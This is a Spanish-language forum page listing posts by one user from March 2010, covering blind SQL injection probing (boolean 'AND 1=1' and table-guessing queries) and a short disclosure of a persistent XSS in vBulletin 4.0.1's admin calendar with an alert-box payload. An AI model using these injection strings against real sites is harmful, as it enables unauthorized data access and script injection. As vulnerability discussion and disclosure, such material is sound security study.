Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

#3362
Nivel Web / Re: Duda en Blind SQLi
9 Marzo 2010, 04:53 AM
Cita de: Vaati en  9 Marzo 2010, 03:33 AMSi primero vamos con lo primero que es estudiar un poco del lenguaje SQL?
Why?
#3363
Es Programación WEB. No es Visual Basic.
Creo que debe de ir en Programación WEB.  :silbar:
#3364
Creo que no entendí  :silbar:
#3365
Nivel Web / Re: Duda en Blind SQLi
8 Marzo 2010, 19:17 PM
Recordad que las Blind SQL Injection, son inyecciones a ciegas. Así que será un poco complicado sacar los datos que queramos obtener.




Se le asigna AND 1=1 porque es una condicion verdaderá asi que deberia de dejarnos pasar como si estuviera solo el ID. Ahora, deberas ir ingresando nombres de tablas aleatoriamente, (Recordad que las Blind SQL Injection, son inyecciones a ciegas), hasta que nó lanze un error, (Si no lanza un error, es porque la consulta es verdadera)...


Ahora esto es lo que no entiendo...
Cita de: tragantras en  8 Marzo 2010, 18:39 PM
Código (php) [Seleccionar]
web?valor=3 and (SELECT Count(*) FROM users) no es que no muestre el valor, es que la página no carga, como si la sentencia SQL fuese incorrecta.
wtf? Si muestra un error, es porque la consulta es Falsa, de lo contrario es Verdadera.
#3366
xD lo más raro de todo, esque tienen una funcion para evitar el XSS dentro del archivo class_core.php en la línea 2387 hasta 2394.
Código (php) [Seleccionar]
function xss_clean($var)
{
static
$preg_find    = array('#^javascript#i', '#^vbscript#i'),
$preg_replace = array('java script',   'vb script');

return preg_replace($preg_find, $preg_replace, htmlspecialchars(trim($var)));
}


:silbar:

#3367
XSS vBulletin 4.0.1

By: Shell Root



Dentro del archivo admincalendar.php de la linea 170 a la 192, se realiza una inserción a la base de datos.
Código (php) [Seleccionar]
$db->query_write("
INSERT INTO " . TABLE_PREFIX . "calendarcustomfield
(
calendarid,
title,
options,
allowentry,
required,
length,
description
)
VALUES
(" .
$vbulletin->GPC['calendarid'] .", '" .
$db->escape_string($vbulletin->GPC['title']) . "', '" .
$db->escape_string($vbulletin->GPC['options']) . "', " .
$vbulletin->GPC['allowentry'] . ", " .
$vbulletin->GPC['required'] . ", " .
$vbulletin->GPC['length'] . ", '" .
$db->escape_string($vbulletin->GPC['description']) . "'
)
");
}


Al mirar detenidamente, se vé la función escape_string y me pregunte y de hecho postee aquí, de que se trataba esa función, ya que no es una función propia del PHP. Me dí a la busqueda de dicha función y se encontraba dentro del archivo includes/class_core.php, desde la linea 717 hasta 727.
Código (php) [Seleccionar]
function escape_string($string)
{
if ($this->functions['escape_string'] == $this->functions['real_escape_string'])
{
return $this->functions['escape_string']($string, $this->connection_master);
}
else
{
return $this->functions['escape_string']($string);
}
}

Esta función lo que hace es evitar caracteres especiales dentro de una sentencia SQL (Como bien me lo dijo Nakp).

Ahora que pasa si no ingresamos caracteres especiales para afectar una sentencia SQL sino algo como esto <script>alert(/XSS/)</script>, os dejara pasar y se convertirá en un XSS Persistente!. Miremos...

Dentro del archivo admincalendar.php, tenemos la oportunidad de modificar un calendario y si miramos el codigo fuente, obtenemos esto: (Solo la parte que os interesa)
Código (php) [Seleccionar]
<input class="bginput" name="calendar[title]" id="it_calendar[title]_1" value="" size="35" dir="ltr" tabindex="1" type="text">

Podemos realizar esto para bypassear el input:
Código (php) [Seleccionar]
"><script>alert(/XSS/)</script>

A lo que al llamarlo quedará así, provocando un XSS Persistente:
Código (php) [Seleccionar]
<input class="bginput" name="calendar[title]" id="it_calendar[title]_1" value=""><script>alert(/XSS/)</script>" size="35" dir="ltr" tabindex="1" type="text">

NOTA: La Inserción del XSS dentro del archivo, es solo por un usuario Administrador
#3368
Bueno, mirando el code de vBulletin 4.0.1, pude sacarle 2 XSS en menos de 10 min, tratando de mirar el code, me encuentro una función escape_string. Pero WTF! no creo que sea una funcion propia del PHP o si?
#3369
Creo que lo que quiere decir, es esto.
Dentro de una Aplicacion en Visual Studio .NET. Tener una Procedimiento, por ejemplo:
Código (vbnet) [Seleccionar]
Public Sub ShellRoot()
   MsgBox ("Hola")
End Sub


Y convertir en ejecutable, como si fuera la aplicacion principal, ese codigo, Osea, generar una archivo ejecutable que al ejecutarlo muestre el MsgBox
#3370
Bases de Datos / Re: Duda Resultado SQL
5 Marzo 2010, 21:33 PM
xD Fucking, eso no lo sabia!  :silbar:

Solucionado! Thanks you two!